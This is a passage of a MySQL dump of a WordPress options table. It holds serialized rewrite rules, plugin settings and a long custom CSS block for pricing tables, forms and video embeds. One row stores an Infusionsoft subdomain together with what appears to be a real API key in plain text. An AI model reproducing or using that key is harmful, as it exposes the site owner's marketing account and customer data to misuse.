ches[1]";s:26:"[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:46:"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:41:"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:41:"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:22:"[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";}', 'yes'),
(4147, 'infusionsoft_settings', 'a:3:{s:9:"subdomain";s:12:"beliefcloset";s:7:"api_key";s:32:"f116dd1e6ffdcbb4e7302d3f8a225cf4";s:14:"gf_integration";b:0;}', 'yes'),
(6108, 'vfb-settings', 'a:3:{s:11:"spam-points";s:1:"4";s:15:"max-upload-size";s:3:"100";s:18:"sender-mail-header";s:30:"wordpress@clearyourbeliefs.com";}', 'yes'),
(8845, 'su_option_skin', 'default', 'yes');
INSERT INTO `cyb_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(8813, 'sccss_settings', 'a:1:{s:13:"sccss-content";s:22681:"/* Enter Your Custom CSS Here */\r\n@import url(''https://fonts.googleapis.com/css?family=Muli:200,300,400,600,700,800,900'');\r\n\r\n/*Table design*/\r\n.uc_expert_price_table h4 {\r\n    font-size: 23px !important;\r\n    color: #0f0f0f !important;\r\n    text-transform: none;\r\n    line-height: 25px;\r\n    margin: 0 0 10px;\r\n    font-family: Muli !important;\r\n    font-weight: 600 !important;\r\n    display: block !important;\r\n    height: auto !important;\r\n    min-height: 80px !important;\r\n     text-transform: none !important;\r\n}\r\n.uc_price_detail ul {list-style:none !important;}\r\n\r\n.uc_price_detail ul li::before {\r\n    content: "" !important;\r\n}\r\n.uc_expert_price_table .uc_price_detail ul li {\r\n    display: block;\r\n    font-weight: 400 !important;\r\n    font-size: 15px !important;\r\n    line-height: 20px;\r\n    margin: 0 0 10px !important;\r\n    font-family: Muli !important;\r\n    color: #000 !important;\r\n}\r\n.uc_expert_price_table a.uc_btn {\r\n    text-decoration: none !important;\r\n    text-transform: capitalize !important;\r\n    display: inline-block;\r\n    margin: 15px 0 5px !important;\r\n    border: 1px solid #3aafd6 !important;\r\n    color: #fff !important;\r\n    border-radius: 5px !important;\r\n    font-size: 14px !important;\r\n    padding: 8px 20px !important;\r\n    line-height: 21px !important;\r\n    background: #3aafd6 !important;\r\n    font-family: Muli !important;\r\n    font-weight: 600 !important;\r\n}\r\n.uc_expert_price_table a.uc_btn:hover {\r\n	    color: #fff !important;\r\n}\r\n.uc_expert_price_table .uc_price_marker_content {\r\n    display: table-cell;\r\n    vertical-align: middle;\r\n    font-family: Muli !important;\r\n    font-size: 28px !important;\r\n    font-weight: 600 !important;\r\n}\r\n.uc_expert_price_table .uc_content_box {\r\n    border: 1px solid #c8c8c8 !important;\r\n    box-shadow: 1px 1px 1px 0 #cfc6c6 !important;\r\n}\r\n\r\n\r\n\r\n/* Table design End*/\r\n\r\n.single-product .site-content .entry-meta > span {\r\n    display: none;\r\n    margin-right: 10px;\r\n}\r\n.single-product .comments-area {\r\n    display: none;\r\n    max-width: 100%;\r\n}\r\n\r\n.single-product .content-sidebar {\r\n    display: none;\r\n    margin-left: -29.0476%;\r\n    width: 0;\r\n}\r\n.single-product .nav-links {\r\n    display: none;\r\n}\r\n.single-product .product_info, .singular .product_info {\r\n    width: 100%;\r\n}\r\n\r\n.single-product .product_block_wrapper {\r\n    border-bottom: 0 solid #e2e2e2;\r\n}\r\n\r\n.tax-products_categories .content-sidebar {\r\n    display: none;\r\n    margin-left: -29.0476%;\r\n    width: 0;\r\n}\r\n\r\n.entry-content .product {\r\n    box-shadow: 2px 3px 4px 2px #777;\r\n}\r\n\r\n .product {\r\n    box-shadow: 0px 0px 0px 0px #777;\r\n}\r\n\r\n@media (max-width: 479px){\r\n.page-id-2071 .entry-content p{\r\n    margin-left: 20px;\r\n    margin-right: 20px;\r\n}\r\n}\r\n.main-content{\r\n //padding-left: 30px; \r\n}\r\n.entry-header {\r\n    display: none !important;\r\n}\r\n\r\n.button {\r\n   border-top: 1px solid #96d1f8;\r\n   background: #65a9d7;\r\n   background: -webkit-gradient(linear, left top, left bottom, from(#3e779d), to(#65a9d7));\r\n   background: -webkit-linear-gradient(top, #3e779d, #65a9d7);\r\n   background: -moz-linear-gradient(top, #3e779d, #65a9d7);\r\n   background: -ms-linear-gradient(top, #3e779d, #65a9d7);\r\n   background: -o-linear-gradient(top, #3e779d, #65a9d7);\r\n   padding: 19.5px 39px;\r\n   -webkit-border-radius: 20px;\r\n   -moz-border-radius: 20px;\r\n   border-radius: 20px;\r\n   -webkit-box-shadow: rgba(0,0,0,1) 0 1px 0;\r\n   -moz-box-shadow: rgba(0,0,0,1) 0 1px 0;\r\n   box-shadow: rgba(0,0,0,1) 0 1px 0;\r\n   text-shadow: rgba(0,0,0,.4) 0 1px 0;\r\n   color: white;\r\n   font-size: 21px;\r\n   font-family: Georgia, serif;\r\n   text-decoration: none;\r\n   vertical-align: middle;\r\n   }\r\n.button:hover {\r\n   border-top-color: #28597a;\r\n   background: #28597a;\r\n   color: #cccccc;\r\n   }\r\n.button:active {\r\n   border-top-color: #1b435e;\r\n   background: #1b435e;\r\n   }\r\n\r\n\r\niframe {\r\n   /* box-shadow: 0 8px 5px rgba(31, 25, 31, 0.39); */\r\n\r\n}\r\n.page-id-1450>#page>#main>#main-content>#primary>#content>article{\r\nmargin-bottom:0px !important;\r\n}\r\n/*----------Video-------------\r\n.embed-container { \r\n  position: relative;\r\n  padding-bottom:41.25%; \r\n  height: 0; \r\n  overflow:hidden; \r\n  max-width: 100%;\r\n  height: auto; \r\n} \r\n.embed-container iframe, .embed-container object, .embed-container embed \r\n{\r\n  height: 97%;\r\n    left: 0;\r\n    margin-left: 15%;\r\n    margin-right: 15%;\r\n    position: absolute;\r\n    top: 0;\r\n    width: 70%;\r\n}\r\n----------End Video-------------*/\r\n/*--------Video-----------*/\r\n.embed-container { \r\n  position: relative;\r\n  overflow:hidden; \r\n  max-width: 100%;\r\n  padding-bottom: 15px !important;\r\n}\r\n.embed-container iframe, .embed-container object, .embed-container embed {\r\n    top: 0;\r\n   box-shadow: 0 21px 10px -10px rgba(31, 31, 31, 0.39);\r\n}\r\n@media (max-width: 359px){\r\n  .embed-container iframe, .embed-container object, .embed-container embed {\r\n  	width:300px !important;\r\n  	height: 177px !important;\r\n  }\r\n}\r\n@media (min-width: 360px) and (max-width: 479px){\r\n  .embed-container iframe, .embed-container object, .embed-container embed {\r\n  	width:340px !important;\r\n  	height: 200px !important;\r\n  }\r\n}\r\n@media (min-width: 480px) and (max-width: 639px){\r\n  .embed-container iframe, .embed-container object, .embed-container embed {\r\n  	width:450px !important;\r\n  	height: 262px !important;\r\n  }\r\n}\r\n@media (min-width: 640px) and (max-width: 767px){\r\n  .embed-container iframe, .embed-container object, .embed-container embed {\r\n  	width:620px !important;\r\n  	height: 355px !important;\r\n  }\r\n}\r\n@media (min-width: 768px){\r\n  .embed-container iframe, .embed-container object, .embed-container embed {\r\n  	width:720px !important;\r\n  	height: 400px !important;\r\n  }\r\n .icon_box {\r\n    padding-right: 15px !important;\r\n    padding-left: 15px !important;\r\n}\r\n\r\n}\r\n/*---------End Video-------*/\r\n\r\n.site-content .entry-summary, .site-content footer.entry-meta {\r\n    padding-left: 0 !important;\r\n    padding-right: 0 !important;\r\n}\r\n.archive-header, .comments-area, .image-navigation, .page-header, .page-content, .post-navigation, .site-content .entry-content, .site-content .entry-summary, .site-content footer.entry-meta {\r\n    padding-left: 0 !important;\r\n    padding-right: 0 !important;\r\n}\r\n.page-id-1450 #site-header {display: none !important;}\r\n.page-id-1450 #masthead {display: none !important;}\r\n.page-id-1450 body{background-color: #fff !important;}\r\n.page-id-1450 #page {margin-top: 0px !important;}\r\n.page-id-1450 #main {box-shadow: none !important;}\r\n.page-id-1450 body {background-color: #d7d7d7 !important;}\r\n.page-id-1450 #panel-1450-0-0-0 { margin-top: 0px; margin-left: 0px;/*margin-top: -50px; width: 960px; margin-left: -140px;*/}\r\n.page-id-1450 .entry-header {display: none !important;}\r\n.page-id-1450 .entry-content img{border-radius: 0px !important;       margin: 0 !important;}\r\n.page-id-1450 .entry-content img{box-shadow: 0 0 0 0 #aaa !important;}\r\n.page-id-1450 .widget ul {list-style: disc !important;}\r\n#divStroke {border: 2px solid #1a2d8c; -webkit-border-radius: 8px; -moz-border-radius:8px; border-radius:8px; padding:10px 20px;}\r\n#pg-1450-0, #pg-1450-1, #pg-1450-2, #pg-1450-3, #pg-1450-4, #pg-1450-5, .panel-grid-cell .panel {\r\n    margin-bottom: 0 !important;\r\n}\r\n.page-id-1450 #colophon {display: none !important;}\r\n.form10 .button-submit {background: url("http://clearyourbeliefs.com/wp-content/uploads/2014/10/get-access.jpg") repeat no-repeat 0 0 #fff !important;}\r\n#divStroke2 {border: 2px #e8e8e8; padding:10px 15px; background: none repeat scroll 0 0 #e8e8e8;}\r\n#pg-1450-2 .su-box-content {\r\n    min-height: 327px;\r\n}\r\n#pg-1450-0 .textwidget {width: 100% !important/* width: 1110px !important*/}\r\n#pg-1450-2 #pgc-1450-2-1 span{\r\n    border-color: #6675bf;\r\n    border-radius: 11px;\r\n    color: #ffffff;\r\n    font-size: 14px !important;\r\n    line-height: 42px;\r\n    min-width: 174px !important;\r\n    padding: 0 10px;\r\n    text-shadow: none;\r\n}\r\n#pgc-1450-2-1 #panel-1450-2-1-0 .su-button {\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.page-id-1450 .edit-link{\r\n	display: none;\r\n}\r\n\r\nbody {\r\n    margin: 0 auto;\r\n    width: 100% !important;\r\n}\r\n\r\n.page-id-1450 #main {\r\n    width: 100% !important;\r\n}\r\n\r\n.content-area {\r\n    padding-left: 0 !important;\r\n    width: 100% !important;\r\n}\r\n\r\n.page .entry-content {\r\n    padding-top: 0;\r\n    width: 100% !important;\r\n}\r\n\r\n#main{\r\n  width: 100%;\r\n}\r\n\r\n.entry-content{\r\n  max-width: 100% !important;\r\n}\r\n\r\n#pg-1450-1 {\r\n    width: 100% !important;\r\n}\r\n\r\n#pg-1450-5{\r\n	width: 100%\r\n}\r\n\r\n#divStroke2{\r\n	margin: 0;\r\n}\r\n\r\n.su-button{\r\n	width: 80%;\r\n}\r\n\r\n#pg-1450-6 {\r\n  margin-top: -30px; \r\n  margin-left: auto; \r\n  margin-right: auto; \r\n  margin-bottom: -48px;\r\n}\r\n\r\n  .img-responsive {\r\n      width: 64pc;\r\n  }\r\n\r\n/* Smartphones (portrait) ----------- */\r\n@media only screen and (max-width : 320px) {\r\n  \r\n body {\r\n    padding-left: 0;\r\n}\r\n\r\n.img-responsive {\r\n    width: 100%\r\n}\r\n#pg-1450-0 .textwidget {\r\n    width: 320px !important;\r\n}\r\n}\r\n@media only screen and (min-device-width : 360px)and (max-device-width : 360px){\r\n   body {\r\n    padding-left: 0!important;\r\n}\r\n.page-id-1450 #panel-1450-0-0-0 {\r\n    margin-left: -50px;\r\n    margin-top: -50px;\r\n    width: 360px;\r\n}\r\n#pg-1450-0 .textwidget {\r\n   width: 100%!important;\r\n}\r\n\r\n    .img-responsive {\r\n      width: 100%\r\n  }\r\n}\r\n/* Smartphones (portrait and landscape) ----------- */\r\n@media only screen and (min-device-width : 480px) and (max-device-width : 480px) and (orientation : landscape){\r\n   body {\r\n    padding-left: 0;\r\n}\r\n.page-id-1450 #panel-1450-0-0-0 {\r\n    margin-left: calc(0 ,0);\r\n    width:calc(0,0);\r\n}\r\n  #pg-1450-0 .textwidget {\r\n    width: 53% !important;\r\n}\r\n.img-responsive {\r\n    width: 100%;\r\n}\r\n}\r\n/* Smartphones (portrait and landscape) ----------- */\r\n@media only screen and (min-device-width : 640px) and (max-device-width : 640px) and (orientation : landscape){\r\n   body {\r\n    padding-left: 0;\r\n}\r\n  \r\n#pg-1450-0 .textwidget {\r\n    width: auto!important;\r\n    margin-top: -12px;\r\n}\r\n.page-id-1450 #panel-1450-0-0-0 {\r\n    margin-left: -140px;\r\n    margin-top: 0;\r\n    width: 157%;\r\n}\r\n    .img-responsive {\r\n      width: 100%\r\n  }\r\n\r\n\r\n}\r\n\r\n\r\n/* Large screens ----------- */\r\n/* iPads (portrait and landscape) ----------- */\r\n@media only screen and (min-device-width : 768px) and (max-device-width : 1024px){\r\n       body {\r\n        padding-left: 0;\r\n    }\r\n#pg-1450-0 .textwidget {\r\n    width: 100% !important;\r\n}\r\n.page-id-1450 #panel-1450-0-0-0 {\r\n    margin-left: 0px;\r\n    margin-top: 0;\r\n    width: 100%;\r\n}\r\n\r\n        .img-responsive {\r\n          width: 100%\r\n      }\r\n}\r\n@media only screen and (min-device-width : 1024px) and (max-device-width : 1024px){\r\n\r\n}\r\n/*--------ROL---------*/\r\n.home.page-id-1450 > #page.hfeed {\r\n    max-width: 1024px !important;\r\n  \r\n}\r\n.page-id-1450 #pgc-1450-2-2 .su-box-content, .page-id-1450 #pgc-1450-2-0 .su-box-content,\r\n.page-id-1450 #pgc-1450-2-1 .su-box-content{\r\n  padding:0px !important;\r\n}\r\n\r\n\r\n--------------------\r\n\r\n\r\n@media (min-width: 800px) and (max-width: 1023px){\r\n  	.home.page-id-1450 > #page.hfeed {\r\n      width:800px!important;\r\n  }\r\n\r\n	.page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2>.panel-grid-cell{\r\n  		width:100% !important;\r\n	}\r\n}\r\n@media (max-width: 400px){\r\n    body {\r\n  		padding-left:0px !important;\r\n    }\r\n  .page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2>#pgc-1450-2-0>#panel-1450-2-0-0>.textwidget>.su-box>.su-box-content>center>img, .page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2>#pgc-1450-2-1>#panel-1450-2-1-0>.textwidget>.su-box>.su-box-content>center>img{\r\n      width:60px !important;\r\n  }\r\n    .tri-panel-p{\r\n      font-size:17px !important;\r\n    }\r\n    .tri-panel-2nd-p-2{\r\n        font-size:12px !important;\r\n    }\r\n\r\n	p, h3, h1, h4, h5, h2, h6, li {\r\n    font-size: 100% !important;\r\n  }\r\n	.page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2>.panel-grid-cell>.panel.widget{\r\n		width:300px !important;  	\r\n  		margin-right:auto !important;\r\n  		margin-left:auto !important;\r\n	}\r\n}\r\n@media (min-width: 640px) and (max-width: 1023px){\r\n.tri-panel-3rd-p {\r\n    margin-top: 0px !important;\r\n    margin-bottom: 0px !important;\r\n}\r\n.tri-panel-3rd-p-2 {\r\n    font-size: 13px !important;\r\n    margin-top: 0px !important;\r\n}\r\n	.page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2>.panel-grid-cell>.panel.widget{\r\n		width:420px !important;  	\r\n  		margin-right:auto !important;\r\n  		margin-left:auto !important;\r\n	}\r\n	.page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2>.panel-grid-cell{\r\n  		width:100% !important;\r\n	}\r\n}\r\n@media (min-width: 401px) and (max-width: 639px){\r\n	.page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2>.panel-grid-cell>.panel.widget{\r\n		width:320px !important;  	\r\n  		margin-right:auto !important;\r\n  		margin-left:auto !important;\r\n	}\r\n}\r\n@media (max-width: 639px){\r\n\r\n	.page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2>.panel-grid-cell{\r\n  		width:100% !important;\r\n	}\r\n  .page-id-1450 > #page > #main > #main-content > #primary > #content > article > .entry-content > #pg-1450-2 > .panel-grid-cell > .panel > .textwidget > .su-box.su-box-style-default {\r\n      max-height: 388px !important;\r\n  }\r\n}\r\n\r\n@media (max-width: 768px){\r\n.page-id-1450 > #page > #main > #main-content > #primary > #content > article > .entry-content > #pg-1450-3 > #pgc-1450-3-0 > #panel-1450-3-0-0 > .textwidget > #divStroke > .su-row > .su-column-size-1-2 > .su-clearfix > ul {\r\n    margin-left: 25px !important;\r\n}\r\n}\r\n@media (max-width: 767px){\r\n  .home.page-id-1450 > #page.hfeed {\r\n      width:100% !important;\r\n  }\r\n  .page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2>.panel-grid-cell{\r\n    	margin-bottom:0px !important;\r\n  }\r\n	\r\n}\r\n@media (min-width: 1024px){\r\n  .page-id-1450>#page>#main>#main-content>#primary>#content>article>.entry-content>#pg-1450-2.panel-grid {\r\n    padding-left: 50px !important;\r\n    padding-right: 50px !important;\r\n}\r\n  .tri-panel-3rd-p-2{\r\n  	padding: 0 10px !important;\r\n  }\r\n}\r\n\r\n#pg-1450-5 {\r\n    width: 100%;\r\n}\r\n\r\n#pgc-1450-6-0 {\r\n	width: 100%;\r\n}\r\n\r\n#panel-1450-6-0-0 {\r\n    background: none repeat scroll 0 0 #e8e8e8;\r\n    height: 50px;\r\n    padding-top: 1px;\r\n}\r\n\r\n/*11-19-14-*/\r\n#pg-1450-4 > #pgc-1450-4-0 > #panel-1450-4-0-0 > .textwidget > #divStroke li {\r\n    line-height: 100%;\r\n}\r\n\r\n#pg-1450-5 {\r\n    margin: 0 !important;\r\n}\r\n\r\n#pgc-1450-5-0 {\r\n    padding-left: 0px !important;\r\n    padding-right: 0px !important;\r\n}\r\n\r\n#pgc-1450-6-0 {\r\n    padding-left: 0px;\r\n    padding-right: 0px;\r\n}\r\n\r\n#pg-1450-6 {\r\n    margin: -35px auto auto;\r\n}\r\n\r\n#pg-1450-4 {\r\n    margin-top: 15px;\r\n}\r\n\r\n@media (min-width: 320px) and (max-width: 359px){\r\n	.su-button.su-button-style-default > span{\r\n		padding: 0px !important;\r\n		font-size: 12px !important;\r\n	}\r\n	.alignleft.size-full.wp-image-1471 {\r\n    	width: 51% !important;\r\n    }\r\n}\r\n\r\n@media (min-width: 360px) and (max-width: 400px){\r\n	.su-button.su-button-style-default > span{\r\n		padding: 0px !important;\r\n		font-size: 14px !important;\r\n	}\r\n	.alignleft.size-full.wp-image-1471 {\r\n    	width: 51% !important;\r\n    }\r\n}\r\n\r\n@media (min-width: 401px) and (max-width: 523px){\r\n	\r\n.su-button.su-button-style-default > span{\r\n		padding: 0px !important;\r\n		font-size: 16px !important;\r\n	}\r\n}\r\n\r\n@media (min-width: 480px) and (max-width: 600px){\r\n	\r\n.su-button.su-button-style-default > span{\r\n		padding: 0px !important;\r\n		font-size: 18px !important;\r\n	}\r\n}\r\n.page-id-1450 .rd-form-1-3rd{\r\n  bottom: -27px;\r\n}\r\n@media (max-width: 1023px){\r\n#divStroke{\r\n border:none !important;\r\n}\r\n.page-id-1450 .rd-form-1-3rd{\r\n  bottom: 0px;\r\n}\r\n}\r\n\r\n.page-id-1450 > #page > #main > #main-content > #primary > #content > article > .entry-content > #pg-1450-4 > #pgc-1450-4-0, .page-id-1450 > #page > #main > #main-content > #primary > #content > article > .entry-content > #pg-1450-3 > #pgc-1450-3-0 {\r\n    padding: 0 62px;\r\n}\r\n\r\n\r\n.page-id-1450 #pg-1450-0{\r\n  margin: 0;\r\n}\r\n.page-id-1450 #pgc-1450-0-0{\r\npadding: 0 !important;\r\n}\r\n.page-id-1450 #primary{\r\n	padding-top:0px !important;\r\n}\r\n.page-id-1450 #pgc-1450-0-0 .textwidget p{\r\nmargin: 0 !important;\r\n}\r\n.page-id-1450 .su-box-content p{\r\n	display:none;\r\n}\r\n.page-id-1450 .tri-panel-p{\r\n	display:block !important;\r\n}\r\n.page-id-1450 .infusion-field input {\r\n    border: 1px solid #606060 !important;\r\n    width: 100%;\r\n    height: 28px;\r\n    color: #606060;\r\n}\r\n.page-id-1450 .form-input-container-button input {\r\n    background-color: #1a2d8c !important;\r\n    height: 45px;\r\n    width: 100%;\r\n}\r\n.page-id-1450 .infusion-field {\r\n    padding: 10px;\r\n}\r\n.page-id-1450 .form-input-container-button {\r\n    padding: 10px;\r\n}\r\n.page-id-1450 .su-box {\r\n    height: 381px !important;\r\n    max-height: 381px !important;\r\n}\r\n.page-id-1450 .panel-grid{\r\n  	margin: 0 !important;\r\n    margin-top: 15px !important;\r\n}\r\n\r\n\r\n/*------- CLONE PAGE ---------*/\r\n\r\n.three-container .form-label {\r\n    font-family: Verdana;\r\n    font-size: 14px;\r\n}\r\n\r\n.three-container .su-clearfix {\r\n    padding-top: 0px !important;\r\n    padding-right: 0px !important;\r\n    padding-left: 0px !important;\r\n}\r\n.three-container .form-input {\r\n    border-color: #909090 !important;\r\n    color: black !important;\r\n    font-size: 14px !important;\r\n    height: 18px;\r\n    width: 93% !important;\r\n}\r\n.three-container .infusion-form {\r\n    margin-top: -20px !important;\r\n}\r\n\r\n.three-container .su-box-style-default {\r\n    min-height: 393px !important;\r\n}\r\n.letter p {\r\n    margin: 0 0 7px;\r\n    padding-top:0px !important;\r\n    padding-bottom:0px !important;\r\n}\r\n\r\n\r\n#recent-posts-2 {display:none !important}\r\n\r\n\r\n#secondary {\r\n    width: 100% !important;\r\n}\r\n#secondary {\r\n    margin: 0 0 0 -0% !important;\r\n  clear: initial !important;\r\n}\r\n.post-password-form {\r\n	margin-top: 10%;\r\nposition: relative;\r\nz-index: 9999;\r\n}\r\n.post-password-form input[type="submit"] {\r\n    display: block;\r\n    line-height: 27px;\r\n    font-weight: normal;\r\n    padding: 0px 10px;\r\n    border: 0px solid #d7d6d6;\r\n    color: #fff;\r\n    font-size: 15px;\r\n    text-shadow: 0 1px 0 #fff;\r\n    background: #0753cc;\r\n    -webkit-border-radius: 2px;\r\n    border-radius: 2px;\r\n    margin-left: 15% !important;\r\n    margin-top: 20px !important;\r\n    text-transform: none;\r\n    padding: 3px 38px;\r\n    box-shadow: 3px 3px 2px #000;\r\n}\r\n.post-password-form input[type="submit"]:hover {\r\n    display: block;\r\n    line-height: 27px;\r\n    font-weight: normal;\r\n    padding: 0px 10px;\r\n    border: 0px solid #d7d6d6;\r\n    color: #fff;\r\n    font-size: 15px;\r\n    text-shadow: 0 1px 0 #fff;\r\n    background: #0753cc;\r\n    -webkit-border-radius: 2px;\r\n    border-radius: 2px;\r\n    margin-left: 15% !important;\r\n    margin-top: 20px !important;\r\n    text-transform: none;\r\n    padding: 3px 38px;\r\n    box-shadow: 3px 3px 2px #000;\r\n}\r\n.post-password-form input {\r\n    color: #000;\r\n    font: 12px/100% Verdana, sans-serif;\r\n    padding: 11px 30px;\r\n    border: 1px solid #999292;\r\n    box-shadow: 2px 2px 1px #000;\r\n}\r\n\r\n\r\n.simple {}\r\n.simple .infusion-field {\r\n    float: left;\r\n    width: 100%;\r\n    position: relative;\r\n    padding: 6px 0px;\r\n}\r\n.simple .infusion-field label {\r\n    font-family: Muli;\r\n    font-size: 18px;\r\n    font-weight: 400;\r\n}\r\n.simple .infusion-field input {\r\n    font-family: Muli;\r\n    width: 100%;\r\n    max-width: 400px;\r\n    height: 40px !important;\r\n    padding: 0px 11px !important;\r\n    font-size: 14px;\r\n    border-radius: 3px;\r\n    box-shadow: 1px 2px 1px #8c8484;\r\n}\r\n.simple .infusion-field-input-container {}\r\n.simple .infusion-field-input-container select {\r\n    font-family: Muli;\r\n    width: 100%;\r\n    max-width: 400px;\r\n    border-radius: 3px;\r\n    border: 1px solid #d8d8d8;\r\n    box-shadow: 1px 2px 1px #8c8484;\r\n    font-size: 15px;\r\n    padding: 11px 10px;\r\n    color: #807878;\r\n}\r\n.paragraph p {margin-left: 0px !important;\r\nfont-family: Muli !important;\r\nfont-size: 18px !important;\r\n}\r\n\r\n\r\n.simple .infusion-radio {\r\n    float: left;\r\n    width: 100%;\r\n    display: block;\r\n}\r\n.simple .infusion-radio .options-container .infusion-option {\r\n    display: flex;\r\n    float: left;\r\n    padding-right: 10px;\r\n    width: auto;\r\n}\r\n.simple .infusion-radio .options-container .infusion-option input{font-family: Muli;\r\nwidth: auto;\r\nmax-width: none;}\r\n.simple .infusion-radio .options-container {\r\n    display: flex;\r\n}\r\n.simple .infusion-radio .options-container .infusion-option label{\r\n  padding-top: 5px;\r\n  padding-left: 5px;\r\n}\r\n\r\n\r\n\r\n\r\n.simple .infusion-option{\r\n    float: left;\r\n    width: 100%;\r\n    display: flex;\r\n}\r\n.simple .infusion-option input {\r\n    float: left;\r\n    width: auto;\r\n    margin-right: 10px;\r\n}\r\n.simple .infusion-option label {\r\n    padding-top: 5px;\r\n}\r\n.simple .infusion-submit {}\r\n.simple .infusion-submit button {\r\n    background: #0837ad;\r\n    border: 1px solid #0837ad;\r\n    box-shadow: 2px 2px 2px #9f9f9f;\r\n    text-shadow: none;\r\n    font-family: Muli;\r\n    color: #fff;\r\n    float: left;\r\n    width: 100%;\r\n    max-width: 300px;\r\n    font-size: 18px;\r\n    height: 45px;\r\n    border-radius: 5px;\r\n    font-weight: 700;\r\n}\r\n\r\n.simple .infusion-submit button:hover {background: #1e5eff;border: 1px solid #1e5eff;}\r\n\r\n\r\n.password-reset {\r\n    padding-left: 15%;\r\n}\r\n.reset-form {\r\n    width: 100%;\r\n    display: block;\r\n    margin: 0px auto;\r\n    max-width: 700px;\r\n    font-family: Muli;\r\n}\r\n.reset-form p {\r\n    padding-bottom: 0px;\r\n    margin-bottom: 0px;\r\n    text-align: center;\r\n    font-weight: 700;\r\n}\r\n.reset-form em {\r\n    text-align: center;\r\n    display: block;\r\n    padding-bottom: 20px;\r\n}\r\n\r\n\r\n.reset-form .clmn2 {\r\n    float: left;\r\n    width: 100%;\r\n    display: block;\r\n    padding-bottom: 10px;\r\n}\r\n.reset-form .clmn2 input {\r\n    float: left;\r\n    width: 48%;\r\n    margin-right: 12px;\r\n    font-family: Muli;\r\n    height: 38px !important;\r\n}\r\n.reset-form .clmn1 {\r\n    float: left;\r\n    width: 100%;\r\n    display: block;\r\n    padding-bottom: 15px;\r\n}\r\n.reset-form .clmn1 input {\r\n    font-family: Muli;\r\n    height: 38px !important;\r\n    float: none;\r\n    width: 75%;\r\n    display: block;\r\n    margin: 0px auto;\r\n}\r\n.reset-form .infusion-submit {\r\n    float: left;\r\n    width: 100%;\r\n    display: block;\r\n}\r\n.reset-form .infusion-submit button {\r\n    background: #0837ad;\r\n    font-family: Muli;\r\n    color: #fff;\r\n    font-size: 18px;\r\n    text-shadow: none;\r\n    display: block;\r\n    margin: 0px auto;\r\n    width: 100%;\r\n    max-width: 200px;\r\n    padding: 8px 5px;\r\n    border-radius: 5px;\r\n    box-shadow: 0px 0px 1px #000;\r\n}\r\n";}', 'yes'),
(8840, 'su_installed', '1412663844', 'yes'),
(8841, 'su_option_version', '4.9.2', 'yes'),
(8826, 'siteorigin_panels_initial_version', '1.5.3', 'no'),
(8842, 'su_option_custom-formatting', 'on', 'yes'),
(8843, 'su_option_skip', 'on', 'yes'),
(8844, 'su_option_prefix', 'su_', 'yes'),
(11059, 'wpts_bncid', 'O:29:"WPtouchDefaultSettingsBNCID30":9:{s:5:"bncid";s:0:"";s:19:"wptouch_license_key";s:0:"";s:16:"license_accepted";b:0;s:21:"license_accepted_time";i:0;s:22:"next_update_check_time";i:1415882733;s:15:"license_expired";s:1:"0";s:19:"license_expiry_date";i:0;s:16:"referral_user_id";b:0;s:15:"current_version";s:3:"3.6";}', 'yes'),
(8846, 'su_option_custom-css', '', 'yes'),
(8847, 'sunrise_defaults_su', '1', 'yes'),
(8853, 'su_presets_box', 'a:1:{s:9:"last_used";a:3:{s:2:"id";s:9:"last_used";s:4:"name";s:18:"Last used settings";s:8:"settings";a:7:{s:5:"title";s:6:"Step 1";s:5:"style";s:7:"default";s:9:"box_color";s:7:"#1a2d8c";s:11:"title_color";s:7:"#FFFFFF";s:6:"radius";s:1:"8";s:5:"class";s:0:"";s:7:"content";s:11:"Box content";}}}', 'yes'),
(8952, 'wd_form_maker_version', '1.7.17', 'no'),
(9126, 'su_presets_row', 'a:1:{s:9:"last_used";a:3:{s:2:"id";s:9:"last_used";s:4:"name";s:18:"Last used settings";s:8:"settings";a:2:{s:5:"class";s:0:"";s:7:"content";s:83:"[su_column size="1/2"]Content[/su_column]\n[su_column size="1/2"]Content[/su_column]";}}}', 'yes'),
(9114, 'su_presets_tabs', 'a:1:{s:9:"last_used";a:3:{s:2:"id";s:9:"last_used";s:4:"name";s:18:"Last used settings";s:8:"settings";a:5:{s:5:"style";s:7:"default";s:6:"active";s:1:"2";s:8:"vertical";s:2:"no";s:5:"class";s:0:"";s:7:"content";s:140:"[su_tab title="What You Can Accomplish with Clear Your Beliefs \n"]Content 1[/su_tab]\n[su_tab title="How and Why It Works"]Content 2[/su_tab]";}}}', 'yes'),
(9120, 'su_presets_column', 'a:1:{s:9:"last_used";a:3:{s:2:"id";s:9:"last_used";s:4:"name";s:18:"Last used settings";s:8:"settings";a:4:{s:4:"size";s:3:"1/2";s:6:"center";s:2:"no";s:5:"class";s:0:"";s:7:"content";s:1:"1";}}}', 'yes'),
